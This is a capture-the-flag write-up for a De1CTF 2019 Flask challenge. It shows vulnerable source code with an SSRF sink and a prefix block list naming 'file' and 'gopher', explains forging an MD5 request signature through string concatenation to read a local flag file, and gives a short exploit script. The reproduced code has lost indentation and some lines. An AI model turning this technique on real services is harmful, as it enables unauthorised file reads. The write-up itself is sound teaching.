Rating: 5.0

# SSRF Me - Writeup
##### By *sh4d0w58*

### Description:


### Solution:

On visiting []( we are given the source code of the Flask App that we are interfacing with:

#! /usr/bin/env python
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json

app = Flask(__name__)
secert_key = os.urandom(16)

class Task:
def __init__(self, action, param, sign, ip):
self.action = action
self.param = param
self.sign = sign
self.sandbox = md5(ip)
if(not os.path.exists(self.sandbox)):
#SandBox For Remote_Addr

def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
print resp
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
result['code'] = 500
result['msg'] = "Sign Error"
return result

def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
return False

#generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)

def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())

def index():
return open("code.txt","r").read()

def scan(param):
return urllib.urlopen(param).read()[:50]
return "Connection Timeout"

def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()

def md5(content):
return hashlib.md5(content).hexdigest()

def waf(param):
if check.startswith("gopher") or check.startswith("file"):
return True
return False

if __name__ == '__main__':
app.debug = False

Looking over it, we see that visiting `"/De1ta"` will execute the `challenge()` function and construct a new `Task` object with an `action`, `param`, and `sign` that we provide as cookies and a GET parameter. (Also our `ip` is passed to it). Then it will call the `Exec()` method of the object and return the json result.

task = Task(action, param, sign, ip)
return json.dumps(task.Exec())

Inside `Exec()`, `checkSign()` is called. This function checks whether the `sign` value is the same as the value generated by `getSign()`. We have to pass this check to move on to the rest of `Exec()`.

def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
return False

`getSign()` performs an md5 hash with `secret_key + param + action`. `secret_key` is a random value that is generated by the App, so we don't know it.

def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()

So now we need a way to generate a valid sign. Making a request to `/geneSign` will generate a `sign` value for us, however it will only allow us to pass it the `param` value and the `action` value will be set to `"scan"`.

@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)

Now that we can generate a valid `sign` value, we can pass the check and move on to the rest of `Exec()`. The first `if` case checks if `"scan"` is `in` `action`. Notice, it does not check whether `action == "scan"`, only whether it contains it. This will be important later. The `"scan"` action will make a request with the value of `param` and write it to a file.

if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
print resp
result['code'] = 200

The second `if` case performs the same check with `"read"`. This action will read the file that we just wrote the result of `"scan"` to.

if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()

Going back to the `"scan"` case, we see the function `scan()` is called with our `param`. This function will use `urllib.urlopen()` to perform the request and this is where the SSRF vulnerability is.

def scan(param):
return urllib.urlopen(param).read()[:50]
return "Connection Timeout"

To read local files we could use the `"file://"` protocol, however any `param` value that starts with `"file"` or `"gopher"` is blocked in the `challenge()` function. I believe there are multiple ways to get past this, but I noticed that starting `param` without a protocol would attempt to read files from the file system. The challenge hint says...

>flag is in ./flag.txt

This will allow us to read the flag into a file, but we will not be able to read it without a valid sign with the action **including** `"read"`. If we can generate a sign for the `action` as `"readscan"`, we can perform the scan and read the result in one go.

Notice, `geneSign()` will perform an md5 hash of `secret + param + action` so we can pass the value of `param` as `"flag.txtread"` (the value of `action` will be `"scan"`) and generate the *same* hash as if we pass `param` as `"flag.txt"` and `action` as `"readscan"`.

```"flag.txtread"+"scan" == "flag.txt"+"readscan"```

You could also use a length extension attack, but this way is more simple.

So our exploit is complete.

We get the flag `"de1ctf{27782fcffbb7d00309a93bc49b74ca26}"`

### Full Code:

import requests

def geneSign(param):
return requests.get(""+param).text

realParam = "flag.txt"

param = realParam+"read"
sign = geneSign(param)
param = realParam

action = "readscan"

answer = requests.get(""+param, cookies={"action":action,"sign":sign}).text


Original writeup (https://github.com/will-lynas/CTF_writeups/blob/master/de1ctf-2019/SSRF_me.md).